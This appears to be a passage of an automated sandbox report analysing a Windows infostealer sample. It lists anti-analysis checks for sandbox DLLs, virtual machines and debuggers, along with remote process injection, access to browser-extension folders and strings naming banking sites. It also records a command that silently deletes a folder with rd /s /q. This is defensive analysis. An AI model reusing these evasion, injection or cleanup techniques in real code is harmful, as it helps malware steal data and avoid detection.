                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: aD7D9fkpII.exeBinary or memory string: DIR_WATCH.DLL
                  Source: aD7D9fkpII.exeBinary or memory string: SBIEDLL.DLL
                  Source: aD7D9fkpII.exe, 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                  Source: aD7D9fkpII.exeBinary or memory string: API_LOG.DLL
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-14398
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-20726
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 8456Thread sleep count: 88 > 30
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_008963B5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_008963B5
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00896304 FindFirstFileExW,0_2_00896304
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_008963B5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_008963B5
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_00896304 FindFirstFileExW,2_2_00896304
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00409460 FindFirstFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_00409460
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,5_2_004170D0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00401730 FindFirstFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,5_2_00401730
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0040A5D0 FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,5_2_0040A5D0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00414BD0 FindFirstFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,5_2_00414BD0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00406FE0 FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,5_2_00406FE0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00413FF0 FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,memset,strtok_s,memset,strtok_s,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,5_2_00413FF0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0040C790 FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,CopyFileA,DeleteFileA,_invalid_parameter_noinfo_noreturn,5_2_0040C790
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,Sleep,CopyFileA,memset,CopyFileA,DeleteFileA,memset,_invalid_parameter_noinfo_noreturn,5_2_004081B0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00413FF0 FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,memset,strtok_s,memset,strtok_s,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,5_2_00413FF0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00410BA0 GetSystemInfo,5_2_00410BA0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: VMware
                  Source: 47GLNG.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: 47GLNG.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: 47GLNG.5.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: aD7D9fkpII.exe, 00000005.00000002.2772700161.0000000001571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: 47GLNG.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: 47GLNG.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                  Source: 47GLNG.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: 47GLNG.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: 47GLNG.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: 47GLNG.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: 47GLNG.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: 47GLNG.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: 47GLNG.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: 47GLNG.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: 47GLNG.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                  Source: 47GLNG.5.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: 47GLNG.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: msedge.exe, 0000000F.00000003.2389307282.000008C4002B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                  Source: 47GLNG.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: 47GLNG.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: 47GLNG.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: 47GLNG.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: 47GLNG.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: 47GLNG.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: 47GLNG.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: chrome.exe, 0000000B.00000002.2319420564.000002B31013D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.2455518093.0000020721E45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=ef5e9e45-9d99-4bdc-8793-7b4e68432271
                  Source: 47GLNG.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: 47GLNG.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: 47GLNG.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: 47GLNG.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: chrome.exe, 0000000B.00000002.2321068387.000002B317CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_0
                  Source: aD7D9fkpII.exe, 00000005.00000002.2772700161.0000000001518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                  Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                  Source: 47GLNG.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: 47GLNG.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: 47GLNG.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: 47GLNG.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeAPI call chain: ExitProcess graph end nodegraph_5-13122
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeAPI call chain: ExitProcess graph end nodegraph_5-13124
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00884073 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00884073
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_008AC19E mov edi, dword ptr fs:[00000030h]0_2_008AC19E
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_008716A0 mov edi, dword ptr fs:[00000030h]0_2_008716A0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_008716A0 mov edi, dword ptr fs:[00000030h]2_2_008716A0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004011F0 mov eax, dword ptr fs:[00000030h]5_2_004011F0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004011F0 mov eax, dword ptr fs:[00000030h]5_2_004011F0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004011F0 mov eax, dword ptr fs:[00000030h]5_2_004011F0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004011F0 mov eax, dword ptr fs:[00000030h]5_2_004011F0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004011F0 mov eax, dword ptr fs:[00000030h]5_2_004011F0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004011F0 mov eax, dword ptr fs:[00000030h]5_2_004011F0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00401170 mov eax, dword ptr fs:[00000030h]5_2_00401170
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00401190 test dword ptr fs:[00000030h], 00000068h5_2_00401190
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004011B0 mov eax, dword ptr fs:[00000030h]5_2_004011B0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00891DBC GetProcessHeap,0_2_00891DBC
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00884067 SetUnhandledExceptionFilter,0_2_00884067
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00884073 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00884073
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00883CB7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00883CB7
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_0088CDB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0088CDB0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_00884067 SetUnhandledExceptionFilter,2_2_00884067
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_00884073 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00884073
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_00883CB7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00883CB7
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_0088CDB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0088CDB0

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: aD7D9fkpII.exe PID: 6408, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aD7D9fkpII.exe PID: 6584, type: MEMORYSTR
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_008AC19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_008AC19E
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeMemory written: C:\Users\user\Desktop\aD7D9fkpII.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQ9ZCBA1N7Q" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,0_2_008911AC
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: EnumSystemLocalesW,0_2_008916A7
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0089566E
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: EnumSystemLocalesW,0_2_008958BF
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0089595A
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: EnumSystemLocalesW,0_2_00895BAD
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: EnumSystemLocalesW,0_2_00895CE1
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,0_2_00895C0C
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00895DD3
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,0_2_00895D2C
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,0_2_00895ED9
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,2_2_008911AC
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: EnumSystemLocalesW,2_2_008916A7
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_0089566E
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: EnumSystemLocalesW,2_2_008958BF
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_0089595A
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: EnumSystemLocalesW,2_2_00895BAD
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: EnumSystemLocalesW,2_2_00895CE1
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,2_2_00895C0C
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00895DD3
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,2_2_00895D2C
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoW,2_2_00895ED9
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: GetLocaleInfoA,5_2_004109F0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_008847EF GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_008847EF
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004108B0 GetProcessHeap,HeapAlloc,GetUserNameA,5_2_004108B0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00410990 GetTimeZoneInformation,5_2_00410990
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
